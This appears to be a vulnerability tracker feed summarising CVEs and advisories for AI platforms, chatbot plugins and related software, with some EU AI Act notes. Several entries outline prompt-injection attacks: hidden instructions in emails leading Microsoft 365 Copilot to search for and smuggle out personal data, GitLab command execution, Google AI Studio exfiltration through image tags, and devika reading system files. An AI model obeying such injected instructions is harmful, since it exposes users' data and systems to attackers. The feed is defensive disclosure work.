All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
CVE-2024-45854 is a vulnerability in MindsDB (a platform for building AI applications) versions 23.10.3.0 and newer where deserialization of untrusted data (converting data from an external format back into executable code without checking if it's safe) allows an attacker to upload a malicious model that runs arbitrary code (any commands the attacker wants) on the server when a describe query is executed on it.
CVE-2024-45853 is a vulnerability in MindsDB (a platform for building AI applications) versions 23.10.2.0 and newer where deserialization of untrusted data (the process of converting received data back into usable objects without checking if it's safe) allows an attacker to upload a malicious model that runs arbitrary code on the server when making predictions. This is a serious flaw because it gives attackers full control to execute whatever commands they want on the affected system.
CVE-2024-45852 is a vulnerability in MindsDB (a platform for building AI applications) versions 23.3.2.0 and newer that allows deserialization of untrusted data (converting untrusted incoming data back into executable code). An attacker can upload a malicious model that runs arbitrary code (any commands they choose) on the server when someone interacts with it.
A security flaw was found in the Chatbot with ChatGPT WordPress plugin (versions before 2.4.5) where certain REST routes (endpoints that external programs use to interact with the plugin) did not properly check user permissions, allowing anyone without logging in to delete error and chat logs.
A WordPress plugin called Chatbot Support AI (versions up to 1.0.2) has a security flaw where it fails to properly clean and filter certain settings, allowing admin users to inject malicious code through stored cross-site scripting (XSS, a type of attack where harmful scripts are saved and executed when users view a page). This vulnerability is particularly dangerous because it works even in multisite setups where HTML code is normally restricted.
Microsoft 365 Copilot has a vulnerability that allows attackers to steal personal information like emails and MFA codes through a multi-step attack. The exploit uses prompt injection (tricking an AI by hiding malicious instructions in emails or documents), automatic tool invocation (making Copilot search for additional sensitive data without user permission), and ASCII smuggling (hiding data in invisible characters within clickable links) to extract and exfiltrate personal information.
CVE-2024-7110 is a vulnerability in GitLab EE (a code management platform) versions 17.0 through 17.3 that allows an attacker to execute arbitrary commands (run code of their choice) in a victim's pipeline through prompt injection (tricking the system by hiding malicious instructions in user input). This vulnerability affects multiple recent versions of the software.
The European AI Act assigns the European Commission's AI Office various responsibilities for regulating AI systems, including promoting AI literacy, overseeing biometric identification systems used by law enforcement, managing a registry of certified testing bodies (notified bodies that verify AI safety), and investigating whether these bodies remain competent. Most of these oversight duties take effect starting February or August 2025, with no specific deadlines given for completing individual tasks.
The EU AI Act requires member states to receive and register notifications about high-risk AI systems (AI systems that pose significant risks to safety or rights) from various parties, including law enforcement agencies using facial recognition systems, AI providers, importers, and organizations deploying these systems. These responsibilities take effect in two phases: August 2, 2025, and August 2, 2026, with member states also needing to assess conformity assessment bodies (independent organizations that verify AI systems meet safety standards) and share documentation with the European Commission.
A researcher discovered a security flaw in Google AI Studio where prompt injection (tricking an AI by hiding instructions in its input) allowed data exfiltration (stealing data) through HTML image tags rendered by the system. The vulnerability worked because Google AI Studio lacked a Content Security Policy (a security rule that restricts where a webpage can load resources from), making it possible to send data to unauthorized servers.
Khoj, an application that creates personal AI agents, has a vulnerability in its Automation feature where users can insert arbitrary HTML and JavaScript code through the q parameter of the /api/automation endpoint due to improper input sanitization (a security flaw called stored XSS, where malicious code gets saved and runs when the page loads). This allows attackers to inject harmful code that affects other users viewing the page.
The Chatbot with ChatGPT WordPress plugin before version 2.4.5 has a SQL injection vulnerability (a type of attack where malicious code is inserted into database queries), which can be exploited by anyone without needing to log in when they submit messages to the chatbot. The plugin fails to properly sanitize and escape a parameter, meaning it doesn't clean or protect user input before using it in a SQL statement.
The Chatbot with ChatGPT WordPress plugin before version 2.4.5 has a vulnerability where it does not properly clean and escape user inputs, allowing attackers to perform Stored Cross-Site Scripting attacks (XSS, a type of attack where malicious code gets saved and runs when admins view it) without needing to be logged in.
A division-by-zero bug occurs in the Linux kernel's memory management when evict_folios() (a function that removes memory pages) incorrectly reduces a counter called nr_scanned, causing it to underflow and become zero. This zero value is later used as a divisor in vmpressure_calc_level() (a function that measures memory pressure), crashing the system.
Streamlit (a Python framework for building data applications) had a path traversal vulnerability (a flaw that lets attackers access files outside their intended directory) in its static file sharing feature on Windows. An attacker could exploit this to steal the password hash (an encrypted version of a password) of the Windows user running Streamlit.
CVE-2024-6706 is a vulnerability where attackers can write malicious prompts that trick a language model into running arbitrary JavaScript (code that executes in a web browser) on a webpage. This is a type of cross-site scripting (XSS) attack, where untrusted input is not properly cleaned before being displayed on a web page, allowing attackers to inject malicious code.
CVE-2024-38206 is a vulnerability in Microsoft Copilot Studio where an authenticated attacker (someone with valid login credentials) can bypass SSRF protection (security that prevents a server from being tricked into making unwanted network requests) to leak sensitive information over a network.
A vulnerability in the stitionai/devika AI project allows attackers to read sensitive files on a computer through prompt injection (tricking an AI by hiding malicious instructions in its input). The problem occurs because Google Gemini's safety filters were disabled, which normally prevent harmful outputs, leaving the system open to commands like reading `/etc/passwd` (a file containing user account information).
CVE-2024-38791 is a server-side request forgery (SSRF, a flaw where an attacker tricks a server into making unwanted requests to other systems) vulnerability in the Jordy Meow AI Engine: ChatGPT Chatbot plugin that affects versions up to 2.4.7. The vulnerability allows attackers to exploit this weakness to perform unauthorized actions by manipulating the plugin's server requests.
Fix: Update the Chatbot with ChatGPT WordPress plugin to version 2.4.5 or later.
NVD/CVE DatabaseOllama before version 0.1.47 has a vulnerability in its extractFromZipFile function where it can extract files from a ZIP archive outside of the intended parent directory, a weakness called path traversal (CWE-22, where an attacker manipulates file paths to access directories they shouldn't). This could allow an attacker to write files to unintended locations on a system when processing a specially crafted ZIP file.
Fix: Update Ollama to version 0.1.47 or later. The fix is available in the comparison between v0.1.46 and v0.1.47 (https://github.com/ollama/ollama/compare/v0.1.46...v0.1.47) and was implemented in pull request #5314 (https://github.com/ollama/ollama/pull/5314).
NVD/CVE DatabaseFix: This vulnerability is fixed in version 1.15.0.
NVD/CVE DatabaseFix: Update the Chatbot with ChatGPT WordPress plugin to version 2.4.5 or later.
NVD/CVE DatabaseFix: The fix is to stop deducting scan_control->nr_scanned in evict_folios(), as stated in the source: 'fix the problem by not deducting scan_control->nr_scanned in evict_folios()'. This prevents the counter from underflowing and eliminates the zero divisor.
NVD/CVE DatabaseFix: The vulnerability was patched on Jul 25, 2024, as part of Streamlit open source version 1.37.0.
NVD/CVE DatabaseFix: Patch available from Microsoft Corporation at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38206
NVD/CVE Database